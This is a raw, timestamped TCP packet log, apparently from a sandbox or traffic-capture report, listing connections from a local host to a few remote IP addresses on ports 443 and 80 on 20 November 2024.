                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.842340946 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.842513084 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.842638969 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.842942953 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.842983007 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.843012094 CET49721443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.843028069 CET4434972113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.846337080 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.846374035 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.846462011 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.846610069 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.846620083 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.848617077 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.848716974 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849206924 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849272966 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849282980 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849299908 CET49725443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849311113 CET4434972513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849333048 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849404097 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849414110 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849422932 CET49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.849426985 CET4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.852550030 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.852564096 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.852638006 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.852962017 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.852977037 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.853998899 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.854007959 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.854127884 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.854329109 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.854345083 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875454903 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875505924 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875608921 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875842094 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875868082 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875911951 CET49723443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.875926018 CET4434972313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.878707886 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.878740072 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.878808975 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.879049063 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.879062891 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888247013 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888308048 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888397932 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888578892 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888578892 CET49722443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888600111 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.888612986 CET4434972213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.901675940 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.901694059 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.901779890 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.902061939 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:15.902071953 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.494174957 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.496886969 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.496907949 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.497376919 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.497384071 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.525120974 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.528002024 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.528018951 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.528481960 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.528486967 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.529397964 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.530380011 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.530416965 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.530802011 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.530807972 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.544465065 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.544708014 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545274973 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545289993 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545734882 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545741081 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545824051 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.545834064 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.546183109 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.546189070 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.592746019 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.592884064 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.592956066 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.593108892 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.593108892 CET49726443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.593130112 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.593142033 CET4434972613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.596441984 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.596470118 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.596606970 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.596940041 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.596966982 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.635668993 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.635719061 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.635807991 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.636059046 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.636059046 CET49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.636074066 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.636085987 CET4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637083054 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637146950 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637193918 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637564898 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637583017 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637594938 CET49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.637599945 CET4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.640429020 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.640508890 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.640599012 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.641870022 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.641901016 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.643342972 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.643382072 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.643551111 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.643681049 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.643686056 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.646492004 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.646541119 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.646595001 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649774075 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649842024 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649945974 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649945974 CET49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649945974 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649956942 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.649965048 CET4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.651191950 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.651191950 CET49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.651199102 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.651206970 CET4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.653359890 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.653383970 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.653637886 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.654706001 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.654728889 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.655641079 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.655668974 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.655884027 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.655884027 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:16.655935049 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.239949942 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.250864983 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.250880957 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.251396894 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.251403093 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.279202938 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.279241085 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.279300928 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.280498981 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.280513048 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.310337067 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.311243057 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.312952995 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.315973997 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.315998077 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.318300962 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.318309069 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.323920012 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.323929071 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.324762106 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.324765921 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.325354099 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.325404882 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.326045036 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.326062918 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.328048944 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.331849098 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.331866026 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.332782984 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.332789898 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.346518040 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.346693039 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.346785069 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.385530949 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.385556936 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.385567904 CET49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.385574102 CET4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.417398930 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.417462111 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.417603970 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.428750038 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.428814888 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.429088116 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.430439949 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.430494070 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.430537939 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.441975117 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.442022085 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.442107916 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.693980932 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.693980932 CET49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.694060087 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.694094896 CET4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.694308996 CET49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.694334984 CET4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.698769093 CET49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.698779106 CET4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.700117111 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.700131893 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.700185061 CET49732443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.700201988 CET4434973213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.816004038 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.816055059 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.816133976 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.842158079 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.842196941 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.842269897 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.842787027 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.842813015 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845673084 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845698118 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845760107 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845928907 CET49739443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845930099 CET49738443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845938921 CET4434973813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.845942974 CET4434973913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.847876072 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.847908974 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.847918034 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.847946882 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.847982883 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.848000050 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.848150969 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.848164082 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.848632097 CET49740443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:17.848645926 CET4434974013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.040663004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.045723915 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.045855999 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.051945925 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.060636044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.068032026 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.068223000 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.070274115 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.070286036 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.070621014 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.072770119 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.072850943 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.072855949 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.073004961 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.119333982 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.243344069 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.243530035 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.243613958 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.243762016 CET49736443192.168.2.640.115.3.253
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.243782043 CET4434973640.115.3.253192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.494232893 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.495076895 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.495119095 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.495723963 CET49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.495732069 CET4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.504163027 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.505459070 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.505500078 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.506234884 CET49741443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.506242990 CET4434974113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:18.513456106 CET4434973913.107.246.45192.168.2.6
